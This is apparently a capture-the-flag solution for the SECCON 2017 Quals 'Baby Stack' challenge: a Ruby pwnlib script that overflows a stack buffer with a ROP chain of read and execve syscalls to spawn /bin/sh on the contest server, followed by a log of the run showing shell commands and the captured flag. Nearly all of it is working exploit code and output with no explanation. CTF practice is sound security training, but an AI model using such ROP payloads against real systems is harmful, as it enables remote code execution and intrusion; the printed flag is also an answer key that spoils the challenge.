SECCON 2017 Quals - Baby Stack

baby_stack.rb

#coding:ascii-8bit
require "pwnlib"

remote = ARGV[0] == "r"
if remote
  host = "baby_stack.pwn.seccon.jp"
  port = 15285
else
  host = "localhost"
  port = 54321
end

def call_syscall(num, arg1 = 0, arg2 = 0, arg3 = 0)
  [0x496a30, 0x406979, num, arg1, arg2, arg3, 0, 0, 0].pack("Q*")
end

PwnTube.open(host, port){|tube|

  puts "[*] send ROP payload"
  payload = ""
  payload << "A" * 16
  tube.recv_until("Please tell me your name >> ")
  tube.sendline(payload)
  payload = ""
  payload << "\0" * 0x198
  payload << call_syscall(0, 0, 0x58e000, 16)
  payload << call_syscall(59, 0x58e000, 0, 0)
  tube.recv_until("Give me your message >> ")
  tube.sendline(payload)

  puts "[*] send /bin/sh"
  sleep 1
  tube.send("/bin/sh\0")

  puts "[*] launch shell"
  tube.recv
  tube.interactive
}

gistfile1.txt

$ ruby baby_stack.rb r
[*] connected
[*] send ROP payload
[*] send /bin/sh
[*] launch shell
[*] interactive mode
id
uid=30137 gid=30000(baby_stack) groups=30000(baby_stack)
ls -la
total 2464
drwxr-x--- 2 root baby_stack    4096 Nov 28 18:36 .
drwxr-xr-x 6 root root          4096 Nov 28 18:36 ..
-rw-r----- 1 root baby_stack     220 Sep  1  2015 .bash_logout
-rw-r----- 1 root baby_stack    3771 Sep  1  2015 .bashrc
-rw-r----- 1 root baby_stack     655 May 16  2017 .profile
-rwxr-x--- 1 root baby_stack 2496664 Nov 28 18:36 baby_stack
-rw-r----- 1 root baby_stack      48 Nov 28 18:36 flag.txt
cat flag.txt
SECCON{'un54f3'm0dul3_15_fr13ndly_70_4774ck3r5}
exit
[*] end interactive mode
[*] connection closed